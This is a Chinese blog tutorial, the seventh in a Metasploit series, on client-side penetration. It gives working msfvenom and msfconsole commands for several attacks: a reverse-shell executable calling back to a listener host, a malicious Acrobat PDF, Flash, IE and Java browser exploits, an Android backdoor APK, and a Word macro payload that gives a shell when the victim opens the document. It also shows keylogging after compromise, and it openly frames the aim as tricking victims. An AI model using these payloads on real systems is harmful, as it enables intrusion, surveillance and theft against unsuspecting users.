Metasploit framework(七)——客户端渗透

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。

 

在无法突破网络边界的情况下转而攻击客户端有一些思路,如:
1、社会工程学攻击
2、进而渗透线上业务网络
3、透过含有漏洞利用代码的WEB站点,即:利用客户端漏洞
4、含有漏洞利用代码的DOC、PDF等文档
5、诱骗被害者执行Payload

 

思路举例:

诱骗被害者执行Payload,先生成可执行程序:

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o 1.exe 

将可执行程序发送到客户端等待客户端运行,同时本地msf侦听开启:

msfconsole -q
use exploit/multi/handler 
set payload windows/shell/reverse_tcp
set LHOST 1.1.1.1
set LPORT 4444
exploit


含有漏洞利用代码的DOC、PDF等文档,举例:

(PDF阅读器利用下面的客户端程序的漏洞实现攻击)
利用Acrobat Reader漏洞执行Payload
首先构造PDF文件:

 

exploit/windows/fileformat/adobe_utilprintf 
set payload meterpreter/reverse_tcp
set lhost
set lport
run

被攻击者的电脑的阅读器如果存在漏洞,那么将被执行成功取得shell。
扩展:当取得meterpreter后,可以执行例如以下命令对目标的控制:

use priv 
run post/windows/capture/keylog_recorder (知道对方正在敲击的键盘)

 


利用Flash插件漏洞执行payload(要对应相同的版本)
 

use exploit/multi/browser/adobe_flash_hacking_team_uaf 
use exploit/multi/browser/adobe_flash_opaque_background_uaf 


利用IE浏览器漏洞执行payload

use exploit/windows/browser/ms14_064_ole_code_execution


利用JRE漏洞执行payload
 

use exploit/multi/browser/java_jre17_driver_manager 
use exploit/multi/browser/java_jre17_jmxbean 
use exploit/multi/browser/java_jre17_reflection_types 


生成Android后门程序

use payload/android/meterpreter/reverse_tcp 
generate -f a.apk -p android -t raw

 

VBScript感染方式:
利用宏感染word、Excel文档,从而绕过某些基于文件类型检查的安全机制
先生成VBScript脚本:

msfvenom -a x86 --platform windows -p windows/ meterpreter/reverse_tcp LHOST=172.20.10.11 LPORT=4444 -e x86/shikata_ga_nai -f vba-exe 

再在文档中添加生成的payload:
:视图---->宏---->创建
    payload第一部分粘入VBA代码;
    payload第二部分(data)粘入word文档正文;
最后Msf启动侦听

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp

只要被攻击者点击文档,那么就能够取得shell。


 

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Jeromeyoung666

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值